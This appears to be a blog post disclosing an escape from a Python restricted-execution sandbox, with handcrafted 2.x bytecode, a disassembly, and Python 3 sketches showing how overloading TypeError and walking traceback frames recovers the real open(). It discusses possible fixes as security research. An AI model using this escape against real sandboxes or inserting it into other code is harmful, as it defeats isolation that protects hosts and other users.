That seems like a worthwhile thing to have available, to make uses like the Google App Engine easier to implement and secure. It works (at least, the current version does) by trying to hide anything that code could use to write to the local filesystem. You get a replacement for file()/open() that only allows opening in read mode, and __import__(), execfile(), reload(), etc., are taken out of the builtins dictionary. So (hopefully) the user cannot import anything at all.
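Here is a minimal Python 3 sketch of that first layer, for illustration only. It is not tav's code, and it is not a secure sandbox. It runs untrusted source with a pared-down `__builtins__` dict and a read-only `open()` wrapper. The names `SAFE_BUILTIN_NAMES`, `make_read_only_open` and `run_restricted` are hypothetical.

```python
import builtins

# Hypothetical allow-list. __import__, exec, eval, compile and the real
# open are deliberately absent.
SAFE_BUILTIN_NAMES = ('len', 'range', 'print', 'str', 'int',
                      'TypeError', 'ValueError', 'IOError')


def make_read_only_open(real_open):
    """Hypothetical wrapper that refuses any mode other than reading."""
    def read_only_open(path, mode='r'):
        if mode not in ('r', 'rb'):
            raise IOError('read-only sandbox: mode %r refused' % (mode,))
        return real_open(path, mode)
    return read_only_open


def run_restricted(source):
    """Execute source with a stripped builtins dict; return its namespace."""
    safe_builtins = {name: getattr(builtins, name) for name in SAFE_BUILTIN_NAMES}
    safe_builtins['open'] = make_read_only_open(builtins.open)
    namespace = {'__builtins__': safe_builtins}
    exec(source, namespace)
    return namespace
```

With this in place, `run_restricted("import os")` fails with ImportError, because CPython cannot find `__import__` in the builtins it was given. Opening a file in write mode is refused as well. Hiding names like this is only the first layer, though; the wrapper itself still holds the real `open()`.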
To go further, tav removes the func_* attributes from the FunctionType dictionary. If you had func_closure, for example, you could inspect the closure attached to the replacement open() function and get at the real one. (My recipe on ASPN shows you one way to do that.) A few other attributes are also removed from the dictionaries of built-in types, such as gi_code on GeneratorType.
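In Python 3, the attribute in question is spelled `__closure__` rather than `func_closure`, but the leak works the same way. In this sketch, `make_read_only_open` is a hypothetical wrapper, not the sandbox's actual code. Each closure cell's `cell_contents` hands back the captured object.

```python
import builtins


def make_read_only_open(real_open):
    """Hypothetical sandbox wrapper that closes over the real open()."""
    def read_only_open(path, mode='r'):
        if mode not in ('r', 'rb'):
            raise IOError('read-only')
        return real_open(path, mode)
    return read_only_open


safe_open = make_read_only_open(builtins.open)

# The wrapper's free-variable names line up with its closure cells,
# so anyone who can read __closure__ gets the real open() back.
free_names = safe_open.__code__.co_freevars      # ('real_open',)
cells = safe_open.__closure__
captured = {name: cell.cell_contents for name, cell in zip(free_names, cells)}
recovered = captured['real_open']
```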
The replacement open() function is (now) carefully coded to avoid trusting any globals or the contents of the __builtins__ dictionary when it runs. Otherwise, you could trick it into behaving differently by tampering with the values it reads from there.
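Why this matters can be shown with a small Python 3 sketch. A function resolves global and builtin names each time it runs, so tampering with its namespace after it is defined changes its behaviour. One common defence binds the names as default arguments, which freezes them when the `def` executes. That is not necessarily what tav did. Note also that default arguments are themselves exposed through `__defaults__` (func_defaults in 2.x). `check_mode`, `Hijacked` and `error_after_hijack` are hypothetical names.

```python
# Hypothetical checker that resolves isinstance, str and TypeError each
# time it runs, from its globals and then builtins.
NAIVE_SRC = '''
def check_mode(mode):
    if not isinstance(mode, str):
        raise TypeError('mode must be a string')
    return mode
'''

# Same checker, but the names are bound once, when the def executes,
# via default arguments.
HARDENED_SRC = '''
def check_mode(mode, _isinstance=isinstance, _str=str, _TypeError=TypeError):
    if not _isinstance(mode, _str):
        raise _TypeError('mode must be a string')
    return mode
'''


class Hijacked(Exception):
    """Stand-in for whatever an attacker puts in place of TypeError."""


def error_after_hijack(src, mode):
    """Define check_mode, shadow TypeError afterwards, report what it raises."""
    namespace = {}
    exec(src, namespace)
    namespace['TypeError'] = Hijacked   # tamper *after* definition
    try:
        namespace['check_mode'](mode)
    except Exception as exc:
        return type(exc)
    return None


naive_result = error_after_hijack(NAIVE_SRC, 2)        # Hijacked
hardened_result = error_after_hijack(HARDENED_SRC, 2)  # TypeError
```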
I came up with an exploit that hinges on the continued presence of the compile() builtin in the sandbox. When you use compile(), you get a code object out. Once you have a code object, you can create new code objects (using type(code_object)(arguments)). Since you can put arbitrary bytecode into a new code object, you can make it do a few things that you can't do in normal Python. The most useful one here is getting access to the traceback object from an exception without sys.exc_info() or sys.exc_traceback.
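The sketch below shows the first half of that step in Python 3: compile() hands you a code object, and its type is the code constructor. This is an illustration under an assumption: it uses `code.replace()` (Python 3.8+) instead of calling the constructor directly, because the constructor's argument list changes between versions. It also only swaps a constant, whereas the exploit below supplies raw 2.x bytecode.

```python
import types

# compile() hands back a code object; its type is the code constructor.
code = compile("'hello'", '<sandbox>', 'eval')
CodeType = type(code)

# Derive a modified copy with replace() rather than calling CodeType(...)
# directly; here we only swap one constant.
patched = code.replace(
    co_consts=tuple('goodbye' if c == 'hello' else c for c in code.co_consts)
)
```

Evaluating `patched` yields `'goodbye'`, even though no source code ever contained that string.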
I won't go too far into the details, except to say that when execution enters an exception handler, the top of the value stack holds the exception type, the exception value and the traceback: the same triple you'd get from sys.exc_info(). Roll a little custom bytecode, and you can store the traceback somewhere instead of popping it off and throwing it away (which is what compiler-generated code usually does):
```python
>>> f = type(lambda: 0)(type(compile('1', 'b', 'eval'))(
...     2, 2, 4, 67,
...     'y\x08\x00t\x00\x00\x01Wn\x09\x00\x01\x01a\x00\x00n\x01\x00X|\x01\x00|\x00\x00\x83\x01\x00S',
...     (None,), ('stuff',), ('g', 'x'), 'q', 'f', 1, ''),
...     globals(), None, (TypeError,))
>>> import dis
>>> dis.dis(f)
  1           0 SETUP_EXCEPT             8 (to 11)
              3 LOAD_GLOBAL              0 (stuff)
              6 POP_TOP
              7 POP_BLOCK
              8 JUMP_FORWARD             9 (to 20)
        >>   11 POP_TOP
             12 POP_TOP
             13 STORE_GLOBAL             0 (stuff)
             16 JUMP_FORWARD             1 (to 20)
             19 END_FINALLY
        >>   20 LOAD_FAST                1 (x)
             23 LOAD_FAST                0 (g)
             26 CALL_FUNCTION            1
             29 RETURN_VALUE
```
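The function calls its second argument, x, which defaults to TypeError, with its first argument, g, and returns the result. So f(message) returns TypeError(message). It is built that way because I need to get it to run underneath the replacement open() function, and the easiest way (there are others) is to overload TypeError, the only global that open() references.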
```python
>>> __builtins__.TypeError = f
```
I just call the replacement open() with a mode parameter of 2, so that it will look up and call TypeError. At that point, f kindly stores the traceback object in the global dict under the name "stuff". Traceback objects contain references to frame objects, and you can follow frame objects up the call chain. That makes it easy to get to the frame containing the replacement open() function.
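The following is a Python 3 sketch of the same chain, not a reconstruction of the original 2.x steps. In Python 3 it is easier, because every exception object carries its traceback in `__traceback__`, so no custom bytecode is needed. The guard source, `spy` and `stash` are hypothetical stand-ins:

- a read-only open() that raises a `TypeError` it looks up in its globals at call time;
- an overloaded `TypeError` that captures a traceback;
- a walk up `f_back` to the guard's frame, whose `f_locals` includes the closed-over real open().

```python
import builtins

# Hypothetical guard: a read-only open() that raises a TypeError it looks
# up in its own globals at call time.
GUARD_SRC = '''
def make_read_only_open(real_open):
    def read_only_open(path, mode='r'):
        if not isinstance(mode, str):
            raise TypeError('mode must be a string')
        return real_open(path, mode)
    return read_only_open
'''

sandbox_globals = {}
exec(GUARD_SRC, sandbox_globals)
read_only_open = sandbox_globals['make_read_only_open'](builtins.open)

stash = {}


def spy(*args):
    """Overloaded TypeError: grab a traceback, then act like TypeError."""
    try:
        raise LookupError('deliberate')
    except LookupError as exc:
        # Python 3 exceptions carry their traceback; no sys needed.
        stash['tb'] = exc.__traceback__
    return TypeError(*args)


sandbox_globals['TypeError'] = spy   # overload the guard's only raised name

try:
    read_only_open('unused.txt', 2)   # non-string mode, so spy gets called
except TypeError:
    pass

# tb_frame is spy's own frame; f_back leads up the call chain.
frame = stash['tb'].tb_frame
while frame is not None and frame.f_code.co_name != 'read_only_open':
    frame = frame.f_back

# The guard's frame still exposes its closed-over variables.
recovered_open = frame.f_locals['real_open']
```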
From that point, it's trivial to pull the real open() function out of the frame's local variables and use it.
That works in Python 2.4 through 2.6, and probably some earlier 2.x versions. I seriously doubt it works in 3.0, but I haven't tried, and it might be adaptable to work there.
What's the right approach to fixing this hole? I'm not sure. If tav decides to disallow compile(), that would plug it as far as I know, since I haven't yet found any other way to get at a code object. On the other hand, it would be really nice to keep compile(), to give restricted-environment users as much power as possible without sacrificing security. Removing f_back, f_locals or tb_frame from their respective builtin-type dictionaries, if that is possible, would also plug the hole. However, it would probably break the reporting and display of normal exception tracebacks.
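Here is a rough illustration of why hiding tb_frame would hurt ordinary error reporting. In this minimal formatter sketch (`summarize_traceback` is hypothetical, not the standard library's implementation), even naming each level of a traceback means going through tb_frame to reach the code object. The standard `traceback` module likewise reads tb_frame for every entry it extracts.

```python
import traceback


def summarize_traceback(tb):
    """Hypothetical minimal formatter: (function name, line) per level.

    Every step goes through tb_frame to reach the code object.
    """
    entries = []
    while tb is not None:
        code = tb.tb_frame.f_code
        entries.append((code.co_name, tb.tb_lineno))
        tb = tb.tb_next
    return entries


def inner():
    raise ValueError('boom')


def outer():
    inner()


def capture():
    """Run outer() and return the traceback of the error it raises."""
    try:
        outer()
    except ValueError as exc:
        return exc.__traceback__
    return None


tb = capture()
ours = summarize_traceback(tb)
stdlib_names = [fs.name for fs in traceback.extract_tb(tb)]
```

Both approaches report the levels capture, outer and inner in order, and both need tb_frame to do it.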
Maybe Python could be changed so that it doesn't leave the traceback object on the stack when it enters an exception handler; I admit I don't even know why it does. Does it support some old, no-longer-documented syntax? That change would plug this hole without sacrificing any functionality that I know of, but related exploits might remain.